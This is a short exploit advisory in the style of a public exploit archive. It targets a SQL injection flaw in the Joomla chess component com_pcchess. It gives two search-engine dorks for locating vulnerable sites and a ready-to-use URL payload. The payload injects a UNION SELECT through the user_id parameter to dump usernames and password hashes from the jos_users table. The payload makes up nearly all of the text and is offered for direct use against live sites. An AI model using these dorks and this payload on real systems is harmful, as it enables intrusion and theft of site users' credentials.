######################################################################### # # joomla SQL Injection(com_pcchess) # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com # # MAİL : hackturkiye.hackturkiye@gmail.com # ######################################################################### # # DORK 1 : allinurl: com_pcchess "user_id" # # DORK 2 : allinurl: com_pcchess # ######################################################################### EXPLOIT : index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* ######################################################################### # S@BUN i AM NOT HACKER S@BUN ######################################################################### pcchess 08/20/2005 Robert Prince This component copyright Robert J. Prince, released under the GNU/GPL License rob@princeclan.org www.princeclan.org 0.8